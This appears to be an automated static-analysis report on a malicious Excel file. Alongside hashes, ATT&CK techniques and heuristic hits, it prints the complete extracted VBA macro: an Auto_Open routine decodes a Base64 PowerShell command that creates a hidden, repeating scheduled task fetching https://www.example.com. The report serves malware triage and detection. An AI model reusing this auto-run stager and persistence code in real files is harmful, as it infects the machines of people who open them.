Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 115532ab4f638461…

MALICIOUS

Office (OOXML)

17.1 KB Created: 2021-05-18 11:57:42 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-05-23
MD5: 8af0b71439985b2ca5402fbc26285fdd SHA-1: 5989e5858327c96ad174f4789d3e295a8528163f SHA-256: 115532ab4f6384610dbcd6df95bc54be1c796d5bc343b66c18b118a573128d9b
232 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1105 Ingress Tool Transfer

The sample contains a VBA macro with an Auto_Open subroutine that decodes a Base64 string and executes it using WScript.Shell. The decoded command is a PowerShell script that downloads content from https://www.example.com and creates a scheduled task for persistence. This indicates the document is a downloader designed to fetch and execute further malicious content.

Heuristics 8

  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFz …
    CreateObject("WScript.Shell").Exec (cmd)
  • VBA Base64-decoded Shell command stager critical OLE_VBA_BASE64_SHELL_COMMAND_STAGER
    VBA auto-exec macro decodes Base64 string literals into command or script-launch text and executes the result with Shell. This catches cmd/cscript/PowerShell/VBS launchers hidden from plain keyword matching.
    Matched line in script
    cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFz …
    CreateObject("WScript.Shell").Exec (cmd)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFz …
    CreateObject("WScript.Shell").Exec (cmd)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Attribute VB_Name = "Module1"
    Sub Auto_Open()
    cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFz …
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://www.example.com Referenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2105 bytes
SHA-256: 381e804461623777b8ab74e8ad13f61cd87178f4f10d958f7df76af608fd5c50
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub Auto_Open()
cmd = DecodeBase64("cG93ZXJzaGVsbCAtY29tbWFuZCAgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQWN0aW9uIC1FeGVjdXRlICdQb3dlcnNoZWxsLmV4ZScgLUFyZ3VtZW50ICctTm9Qcm9maWxlIC1XaW5kb3dTdHlsZSBIaWRkZW4gLWNvbW1hbmQgIiYgeyRSZXNwb25zZSA9IEludm9rZS1XZWJSZXF1ZXN0IC1VUkkgaHR0cHM6Ly93d3cuZXhhbXBsZS5jb207ICR3PU5ldy1PYmplY3QgLUNvbU9iamVjdCBXc2NyaXB0LlNoZWxsOyR3LlBvcHVwKFwiVGhlIHByb29mIHRhc2sgd2FzIGV4ZWN1dGVkXCIsMCxcIkRvbmVcIiwweDEpfSInOyAkcmVwZWF0ID0gKE5ldy1UaW1lU3BhbiAtTWludXRlcyA1KTskdHJpZ2dlciA9ICBOZXctU2NoZWR1bGVkVGFza1RyaWdnZXIgLU9uY2UgLUF0IChHZXQtRGF0ZSkuRGF0ZSAtUmVwZXRpdGlvbkludGVydmFsICRyZXBlYXQgLVJlcGV0aXRpb25EdXJhdGlvbiAoTmV3LVRpbWVTcGFuIC1EYXlzICgzNjUgKiAyMCkpO1JlZ2lzdGVyLVNjaGVkdWxlZFRhc2sgLUFjdGlvbiAkYWN0aW9uIC1UcmlnZ2VyICR0cmlnZ2VyIC1UYXNrTmFtZSBcIkV4cGxvaXRpbmcgZXhhbXBsZSB0YXNrXCIgLURlc2NyaXB0aW9uIFwiVGhpcyB3YXMgY3JlYXRlZCBhcyBhIHByb29mIG9mIGEgc3VjY2Vzc2Z1bCBleHBsb2l0IGluIHRoZSBzeXN0ZW0uIEl0IHdpbGwgY3JlYXRlIGluIHRoZSBkZXNrdG9wIGEgcHJvb2YudHh0IGZpbGUgZXZlcnkgNSBtaW51dGVzXCI=")
CreateObject("WScript.Shell").Exec (cmd)

End Sub


Function DecodeBase64(b64$)
    Dim b
    With CreateObject("Microsoft.XMLDOM").createElement("b64")
        .DataType = "bin.base64": .Text = b64
        b = .nodeTypedValue
        With CreateObject("ADODB.Stream")
            .Open: .Type = 1: .Write b: .Position = 0: .Type = 2: .Charset = "utf-8"
            DecodeBase64 = .ReadText
            .Close
        End With
    End With
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 26624 bytes
SHA-256: e9439c5d6e718bf8ae5bc1f2aa4fb74bdeb954742ca6fca3652191612d5ef891
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).